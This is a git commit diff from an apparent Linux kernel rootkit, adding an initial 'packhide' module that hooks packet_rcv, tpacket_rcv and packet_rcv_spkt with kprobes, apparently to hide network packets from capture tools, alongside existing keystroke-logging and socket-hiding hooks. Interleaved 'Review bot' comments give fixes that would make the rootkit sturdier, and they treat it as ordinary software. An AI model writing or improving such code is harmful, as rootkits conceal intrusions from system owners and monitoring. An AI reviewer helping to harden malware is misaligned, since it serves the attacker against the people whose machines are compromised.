commit db731d9f7c963d43ba76edcddce3b2e24846f3d4
parent 76a91a44a79f7c53c480b576a1d854dd52f63c22
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date: Sat, 19 Dec 2020 18:35:20 +0100
Initial kprobe stuff
Diffstat:
3 files changed, 106 insertions(+), 0 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -22,6 +22,7 @@
#include "read.h"
#include "inputlog.h"
#include "sockhide.h"
+#include "packhide.h"
extern rootkit_t rootkit;
@@ -94,6 +95,8 @@ init_hooks(void)
if (rootkit.logging_input)
log_input("127.0.0.1", "5000");
+
+ hide_packets();
}
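Review bot: hide_packets() is called unconditionally here, while the neighbouring log_input() call is gated on `rootkit.logging_input`; if packet hiding is meant to be a configurable feature like the others, guard it the same way, e.g. `if (rootkit.<packet_hiding_flag>) hide_packets();` (the field name is not on the page). The same asymmetry applies to the unhide_packets() call in the remove_hooks hunk below. hide_packets() also returns void, so a failed register_kprobe() inside it is only logged and init_hooks() cannot tell that the hook is missing. The body of init_hooks starts outside the hunk.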
void
@@ -121,6 +124,8 @@ remove_hooks(void)
if (rootkit.logging_input)
unlog_input();
+
+ unhide_packets();
}
void
diff --git a/src/packhide.c b/src/packhide.c
@@ -0,0 +1,98 @@
+#include <linux/kernel.h>
+#include <linux/kprobes.h>
+#include <linux/skbuff.h>
+#include <uapi/linux/if_packet.h>
+
+#include "common.h"
+#include "hook.h"
+
+static int g7_packet_rcv(struct kprobe *, struct pt_regs *);
+static int g7_tpacket_rcv(struct kprobe *, struct pt_regs *);
+static int g7_packet_rcv_spkt(struct kprobe *, struct pt_regs *);
+static int g7_fault(struct kprobe *, struct pt_regs *, int);
+static void g7_post(struct kprobe *, struct pt_regs *m, unsigned long);
+
+static struct kprobe p_rcv = {
+ .symbol_name = "packet_rcv",
+};
+
+static struct kprobe tp_rcv = {
+ .symbol_name = "tpacket_rcv",
+};
+
+static struct kprobe p_rcv_spkt = {
+ .symbol_name = "packet_rcv_spkt",
+};
+
+void
+hide_packets(void)
+{
+ p_rcv.pre_handler = g7_packet_rcv;
+ p_rcv.post_handler = g7_post;
+ p_rcv.fault_handler = g7_fault;
+
+ tp_rcv.pre_handler = g7_tpacket_rcv;
+ tp_rcv.post_handler = g7_post;
+ tp_rcv.fault_handler = g7_fault;
+
+ p_rcv_spkt.pre_handler = g7_packet_rcv_spkt;
+ p_rcv_spkt.post_handler = g7_post;
+ p_rcv_spkt.fault_handler = g7_fault;
+
+ if(register_kprobe(&p_rcv))
+ DEBUG_INFO("[g7] Could not insert kprobe p_rcv\n");
+
+ if(register_kprobe(&tp_rcv))
+ DEBUG_INFO("[g7] Could not insert kprobe tp_rcv\n");
+}
+
+void
+unhide_packets(void)
+{
+ unregister_kprobe(&p_rcv);
+}
+
+static int
+g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
+{
+ struct sk_buff *skb;
+ skb = (struct sk_buff *)pt_regs->di;
+
+ DEBUG_INFO("[p_rcv] proto is %0X\n", skb->protocol);
+
+
+ return 0;
+}
+
+static int
+g7_tpacket_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
+{
+ struct sk_buff *skb;
+ skb = (struct sk_buff *)pt_regs->di;
+
+ DEBUG_INFO("[tp_rcv] proto is %0X\n", skb->protocol);
+
+ return 0;
+}
+
+static int g7_packet_rcv_spkt(struct kprobe *kp, struct pt_regs *pt_regs)
+{
+ struct sk_buff *skb;
+ skb = (struct sk_buff *)pt_regs->di;
+
+ DEBUG_INFO("[tp_rcv] proto is %0X\n", skb->protocol);
+
+ return 0;
+}
+
+static void
+g7_post(struct kprobe *kp, struct pt_regs *pt_regs, unsigned long flags)
+{
+ return;
+}
+
+static int
+g7_fault(struct kprobe *kp, struct pt_regs *pt_regs, int trapnr)
+{
+ return 0;
+}
+\ No newline at end of file
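Review bot: unhide_packets() unregisters only p_rcv, but hide_packets() registers both p_rcv and tp_rcv, so the tp_rcv probe stays armed after unhide_packets() returns; if this is the module-unload path, as the remove_hooks hunk suggests, the probe's handlers would then point into unloaded module text, so add `unregister_kprobe(&tp_rcv);` beside the existing call. Because register_kprobe() failures are only logged, unhide may also unregister a probe that was never registered; keeping a record of which registrations succeeded, or using register_kprobes()/unregister_kprobes() on one array, keeps the two sides symmetric. p_rcv_spkt is given handlers but never registered, and g7_packet_rcv_spkt's DEBUG_INFO is tagged "[tp_rcv]" rather than "[p_rcv_spkt]", so its output cannot be told apart from g7_tpacket_rcv's. In all three handlers `%0X` is applied to `skb->protocol`, which is a __be16, so the format specifier does not match the argument.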
diff --git a/src/packhide.h b/src/packhide.h
@@ -0,0 +1,2 @@
+void hide_packets(void);
+void unhide_packets(void);
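Review bot: The new header has no include guard; re-declaring two prototypes is harmless, but if the project's other headers use guards this one should too, e.g. `#ifndef PACKHIDE_H` / `#define PACKHIDE_H` around the declarations with a closing `#endif`. A one-line comment per prototype stating that hide_packets() registers the kprobes and unhide_packets() must be called before the module is removed would also document the pairing the hook.c hunks rely on.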